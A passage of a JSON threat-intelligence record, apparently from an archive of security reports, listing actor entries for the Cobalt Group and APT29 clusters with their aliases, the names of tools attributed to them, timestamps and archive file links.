			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434107,
	"ts_updated_at": 1775792236,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fb43ff546455506c41067543baf645a7b61a3fd8.pdf",
		"text": "https://archive.orkl.eu/fb43ff546455506c41067543baf645a7b61a3fd8.txt",
		"img": "https://archive.orkl.eu/fb43ff546455506c41067543baf645a7b61a3fd8.jpg"
	}
}